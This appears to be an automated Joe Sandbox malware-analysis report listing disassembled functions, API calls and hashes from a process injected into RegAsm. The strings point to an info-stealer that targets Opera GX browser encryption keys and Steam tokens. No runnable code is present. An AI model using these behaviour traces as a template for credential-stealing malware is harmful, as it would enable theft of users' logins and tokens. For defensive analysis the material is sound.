Associated: 00000002.00000002.2449321753.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: HttpInternet$OpenRequest$ConnectInfoOptionQuerySendlstrcpy
String ID: ERROR$ERROR
API String ID: 3086566538-2579291623
Opcode ID: 1f04a280a058e3c99f689a2c33220ef0c6b47f7de1e09031bce4c6852948f489
Instruction ID: fa6cd13a443083575c3a824eeb1e5676c961334a8f4b47820412c2fdc9a040c1
Opcode Fuzzy Hash: 1f04a280a058e3c99f689a2c33220ef0c6b47f7de1e09031bce4c6852948f489
Instruction Fuzzy Hash: 6F014F75A00118ABCB20FB76D9469CD73A96F04308F55417BBC24E3293E7B8E9494AD9

Function 00416E97 Relevance: 4.6, APIs: 3, Instructions: 70sleepsynchronizationthreadCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(000003E8,?,?), ref: 00416EFE
CreateThread.KERNEL32(00000000,00000000,00416DC6,?,00000000,00000000), ref: 00416F36
WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00416F3E

Memory Dump Source

Source File: 00000002.00000002.2449321753.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2449321753.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: CreateObjectSingleSleepThreadWait
String ID:
API String ID: 4198075804-0
Opcode ID: a1dc13e99dd204c5a3461b4ea6d28ee21b2c0be54f1f4843eeff7d6218642cdc
Instruction ID: 5b264aedade7dddb2649676fe5ff4aca135c6ea40ecc08e40dc523016e9b5da3
Opcode Fuzzy Hash: a1dc13e99dd204c5a3461b4ea6d28ee21b2c0be54f1f4843eeff7d6218642cdc
Instruction Fuzzy Hash: EC213B72900218ABCF14EF96E9459DE7BB9FF40358F11512BF904A3151D738EA86CF98

Function 00412446 Relevance: 4.5, APIs: 3, Instructions: 41fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,?,?,?,?,00414A8D), ref: 00412460
WriteFile.KERNEL32(00000000,00000000,00414A8D,00414A8D,00000000,?,?,?,00414A8D), ref: 00412487
CloseHandle.KERNEL32(00000000,?,?,?,00414A8D), ref: 0041249E

Memory Dump Source

Source File: 00000002.00000002.2449321753.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2449321753.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: File$CloseCreateHandleWrite
String ID:
API String ID: 1065093856-0
Opcode ID: 618600667c8334e05266c7920bfcba6b014638909509334c775888355d968c7c
Instruction ID: a587d297adf89e60fa6946fdd7da6f666782c0f167f87b21f29bcfda1cd19bad
Opcode Fuzzy Hash: 618600667c8334e05266c7920bfcba6b014638909509334c775888355d968c7c
Instruction Fuzzy Hash: 84F02471200118BFEF01AFA4DD8AFEF379CDF053A8F000022F951D6190D3A58D9157A5

Function 6C0E3060 Relevance: 4.5, APIs: 3, Instructions: 36timeCOMMON

Download Yara Rule

APIs

?Startup@TimeStamp@mozilla@@SAXXZ.MOZGLUE ref: 6C0E3095

Part of subcall function 6C0E35A0: InitializeCriticalSectionAndSpinCount.KERNEL32(6C16F688,00001000), ref: 6C0E35D5
Part of subcall function 6C0E35A0: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_TIMESTAMP_MODE), ref: 6C0E35E0
Part of subcall function 6C0E35A0: QueryPerformanceFrequency.KERNEL32(?), ref: 6C0E35FD
Part of subcall function 6C0E35A0: _strnicmp.API-MS-WIN-CRT-STRING-L1-1-0(?,GenuntelineI,0000000C), ref: 6C0E363F
Part of subcall function 6C0E35A0: GetSystemTimeAdjustment.KERNEL32(?,?,?), ref: 6C0E369F
Part of subcall function 6C0E35A0: __aulldiv.LIBCMT ref: 6C0E36E4

?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6C0E309F

Part of subcall function 6C105B50: QueryPerformanceCounter.KERNEL32(?,?,?,?,6C1056EE,?,00000001), ref: 6C105B85
Part of subcall function 6C105B50: EnterCriticalSection.KERNEL32(6C16F688,?,?,?,6C1056EE,?,00000001), ref: 6C105B90
Part of subcall function 6C105B50: LeaveCriticalSection.KERNEL32(6C16F688,?,?,?,6C1056EE,?,00000001), ref: 6C105BD8
Part of subcall function 6C105B50: GetTickCount64.KERNEL32 ref: 6C105BE4

?InitializeUptime@mozilla@@YAXXZ.MOZGLUE ref: 6C0E30BE

Part of subcall function 6C0E30F0: QueryUnbiasedInterruptTime.KERNEL32 ref: 6C0E3127
Part of subcall function 6C0E30F0: __aulldiv.LIBCMT ref: 6C0E3140

Part of subcall function 6C11AB2A: __onexit.LIBCMT ref: 6C11AB30

Memory Dump Source

Source File: 00000002.00000002.2557311614.000000006C0E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0E0000, based on PE: true

Associated: 00000002.00000002.2557234381.000000006C0E0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2561922875.000000006C16E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2562760479.000000006C172000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c0e0000_RegAsm.jbxd

Similarity

API ID: Time$CriticalQuerySection$InitializePerformanceStamp@mozilla@@__aulldiv$AdjustmentCountCount64CounterEnterFrequencyInterruptLeaveNow@SpinStartup@SystemTickUnbiasedUptime@mozilla@@V12@___onexit_strnicmpgetenv
String ID:
API String ID: 4291168024-0
Opcode ID: a6adb042548e604af18a52f8bec49c389fb426f095ba7625ecc5b3e49d604044
Instruction ID: b9483ef2c96763ce918de4e17eefc21e9229f0fc1281c85d5cfca47055c39931
Opcode Fuzzy Hash: a6adb042548e604af18a52f8bec49c389fb426f095ba7625ecc5b3e49d604044
Instruction Fuzzy Hash: 2DF0F922E2474496CA10DF3588413F6B771EF6F218F10672AE85457631FB2072D9D3C6

Function 00410C85 Relevance: 4.5, APIs: 3, Instructions: 22memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00401385), ref: 00410C91
RtlAllocateHeap.NTDLL(00000000,?,?,?,00401385), ref: 00410C98
GetComputerNameA.KERNEL32(00000000,00401385), ref: 00410CAC

Memory Dump Source

Source File: 00000002.00000002.2449321753.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2449321753.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Heap$AllocateComputerNameProcess
String ID:
API String ID: 1664310425-0
Opcode ID: 223c93d772ac102104f3d80f3225d4df8625dfe3dc4c13cc38eb63403da552c2
Instruction ID: 4a48e0897f6a5e53a67cc5d7e0c14adbc6ce47083a4b6c26751418be0e4428b5
Opcode Fuzzy Hash: 223c93d772ac102104f3d80f3225d4df8625dfe3dc4c13cc38eb63403da552c2
Instruction Fuzzy Hash: 2DE08CB1200204BBD7449BD9AC8DF8A76BCDB84715F100226F605D6250EAB4C9848B68

Function 0040C95C Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 286COMMON

Download Yara Rule

APIs

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D

StrCmpCA.SHLWAPI(?,Opera GX,00436853,0043684B,?,?,?), ref: 0040C98F

Part of subcall function 00411DBC: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,?), ref: 00411DFD

Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF

Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD

Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650

Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417621), ref: 00410538

Part of subcall function 00411D92: GetFileAttributesA.KERNEL32(?,?,?,0040DA7F,?,?,?), ref: 00411D99

Part of subcall function 0040819F: StrStrA.SHLWAPI(00000000,"encrypted_key":",?,?,?,?,?,?,0040CC90,?,?), ref: 004081E5

Strings

Opera GX, xrefs: 0040C97F

Memory Dump Source

Source File: 00000002.00000002.2449321753.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2449321753.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrcat$AttributesFileFolderPathlstrlen
String ID: Opera GX
API String ID: 1719890681-3280151751
Opcode ID: 60c01dc8b37e4b84b74df1fa8103c1199fcfef80998ad79c597a27a207442b16
Instruction ID: 2f838092edd703084741f82f1e37e62fc4a331bb811b3281c0e98dae42c078f1
Opcode Fuzzy Hash: 60c01dc8b37e4b84b74df1fa8103c1199fcfef80998ad79c597a27a207442b16
Instruction Fuzzy Hash: 3FB1FD7294011DABCF10FFA6DE425CD7775AF04308F51013AF904771A1DBB8AE8A8B99

Function 00407B0B Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 63memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNEL32(?,?,00000002,00000002,?,?,?,?,00407C56,?), ref: 00407B8A

Strings

, xrefs: 00407B5D

Memory Dump Source

Source File: 00000002.00000002.2449321753.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2449321753.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-3916222277
Opcode ID: 12037c8daa12d7fcab0069a5037541411d8429e4b00213a69a2087787070dd30
Instruction ID: 7cbd0eafb3405f1822ca0081af98c781be9845726f70e814ec0c9ffce599534c
Opcode Fuzzy Hash: 12037c8daa12d7fcab0069a5037541411d8429e4b00213a69a2087787070dd30
Instruction Fuzzy Hash: 14119D71908509ABDB20DF94C684BAAB3F4FB00348F144466D641E32C0D33CBE85D75B

Function 00416FB7 Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 45stringCOMMON

Download Yara Rule

APIs

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D

Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650

Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD

lstrlenA.KERNEL32(?), ref: 00416FFE

Part of subcall function 00416E97: CreateThread.KERNEL32(00000000,00000000,00416DC6,?,00000000,00000000), ref: 00416F36
Part of subcall function 00416E97: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00416F3E

Strings

Soft\Steam\steam_tokens.txt, xrefs: 0041700E

Memory Dump Source

Source File: 00000002.00000002.2449321753.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2449321753.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$CreateObjectSingleThreadWaitlstrcat
String ID: Soft\Steam\steam_tokens.txt
API String ID: 502913869-3507145866
Opcode ID: 212f9d999e26f76b20966994f13319e6fa11f2a26421251c526ef5ee57093a08
Instruction ID: 5852b7b14dd5e00f67c9332eee82213ee25541dc93f475b49d312086d811fdd4
Opcode Fuzzy Hash: 212f9d999e26f76b20966994f13319e6fa11f2a26421251c526ef5ee57093a08
Instruction Fuzzy Hash: A5012571E4010967CF00FBE6DD478CD7B74AF04358F514176FA0077152D779AA8A86D5

Function 00411E1F Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 32memoryCOMMON

Download Yara Rule

APIs

LocalAlloc.KERNEL32(00000040,00000001,?,?,?,00416931,?), ref: 00411E37

Strings

1iA, xrefs: 00411E47

Memory Dump Source

Source File: 00000002.00000002.2449321753.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2449321753.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: AllocLocal
String ID: 1iA
API String ID: 3494564517-1863120733
Opcode ID: ab387d88e84e58f7ee09dd024291177f022f73d374550d18fdbda7562f7ae9e7
Instruction ID: dc66f3ebc75c526b8f29ca666c763a1a9938aadc44e5483d7dab6bcf02b3e8fe
Opcode Fuzzy Hash: ab387d88e84e58f7ee09dd024291177f022f73d374550d18fdbda7562f7ae9e7
Instruction Fuzzy Hash: 08E02B3AA41B201FC7724BAA8804AB7BB5A9FC2F61B18412BDF49CB324D535CC4182E4

Function 00409072 Relevance: 2.7, APIs: 2, Instructions: 163stringCOMMON

Download Yara Rule

APIs

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D

lstrlenA.KERNEL32(?), ref: 00409209
lstrlenA.KERNEL32(?), ref: 00409224

Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650

Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF

Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD

Memory Dump Source

Source File: 00000002.00000002.2449321753.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2449321753.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$lstrcat
String ID:
API String ID: 2500673778-0
Opcode ID: 22752c67e7cf8aea0990da859bb6639e3ce1bf9e8e527a47f60de06b505466f8
Instruction ID: 27ee426b6b58d638c78c42283a2d386f26495828f80e9e64967a6f8c5e3c9e1b
Opcode Fuzzy Hash: 22752c67e7cf8aea0990da859bb6639e3ce1bf9e8e527a47f60de06b505466f8
Instruction Fuzzy Hash: 49513D71A00119ABCF01FFA5EE468DD7775AF04309F50002AF500B71A2DBB8AE898B99

Function 004077F8 Relevance: 2.6, APIs: 2, Instructions: 63memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(?,?,00003000,00000040,00000000,?,?,?,00407C18,?,?), ref: 0040784A
VirtualAlloc.KERNEL32(00000000,?,00003000,00000040), ref: 00407874

Memory Dump Source

Source File: 00000002.00000002.2449321753.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2449321753.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: c062e49b8eac24d7b45a027ae12e9eff25198202155d78bc8260cd663ae55519
Instruction ID: 58502b0b00c881bab5b754626ee9ce4ad9b10c36d9ff74d45ae59ae86afa5875
Opcode Fuzzy Hash: c062e49b8eac24d7b45a027ae12e9eff25198202155d78bc8260cd663ae55519
Instruction Fuzzy Hash: C311B472A44705ABC724CFB8C989B9BB7F4EB40714F24483EE54AE7390E274B940C715

Function 0041CBB8 Relevance: 2.5, APIs: 2, Instructions: 39COMMON

Download Yara Rule

APIs

malloc.MSVCRT ref: 0041CBC9

Part of subcall function 0041BB6C: lstrlenA.KERNEL32(?,0041CBDA,0041CC7C,00000000,06400000,00000003,00000000,0041757F,.exe,00436C5C,00436C58,00436C54,00436C50,00436C4C,00436C48,00436C44), ref: 0041BB9E
Part of subcall function 0041BB6C: malloc.MSVCRT ref: 0041BBA6
Part of subcall function 0041BB6C: lstrcpyA.KERNEL32(00000000,?), ref: 0041BBB1

malloc.MSVCRT ref: 0041CC06

Memory Dump Source

Source File: 00000002.00000002.2449321753.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2449321753.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: malloc$lstrcpylstrlen
String ID:
API String ID: 2974738957-0
Opcode ID: 4595bf6652bd861db47711c07eba1f475a4793355c0293ea92a90e9bc1e457ce
Instruction ID: ee4a01d13f6e4d683757beabffaaf009a5c9ff74aa08d02828624340765fdc95
Opcode Fuzzy Hash: 4595bf6652bd861db47711c07eba1f475a4793355c0293ea92a90e9bc1e457ce
Instruction Fuzzy Hash: FBF0F0766482119BC7206F66EC8199BBB94EB447A0F054027EE08DB341EA38DC8083E8

Function 004184AE Relevance: 1.6, APIs: 1, Instructions: 133COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2449321753.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2449321753.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
